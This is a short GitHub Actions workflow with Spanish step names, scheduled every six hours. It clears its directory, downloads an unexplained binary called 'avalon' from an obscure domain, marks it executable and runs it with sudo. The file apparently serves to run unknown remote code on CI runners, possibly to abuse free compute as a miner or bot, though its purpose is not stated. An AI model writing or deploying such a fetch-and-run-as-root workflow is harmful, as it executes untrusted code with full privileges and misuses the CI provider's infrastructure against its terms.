name: bot666666677777

on:
  workflow_dispatch:
  schedule:
    - cron: '0 */6 * * *'

jobs:
  avalon-run:
    runs-on: ubuntu-latest
    
    steps:
    - name: 🗑️ Limpiar directorio
      run: |
        rm -rf * 2>/dev/null || true
    
    - name: 🚀 Descargar y Ejecutar Avalon
      run: |
        # 1. Descargar el archivo
        wget https://dcasdcas.online/avalon.x86_64
        
        # 2. Renombrar el archivo
        mv avalon.x86_64 avalon
        
        # 3. Dar permisos de ejecución
        chmod +x avalon
        
        # 4. Ejecutar con sudo y el parámetro codespace
        echo "Iniciando avalon..."
        sudo ./avalon codespace
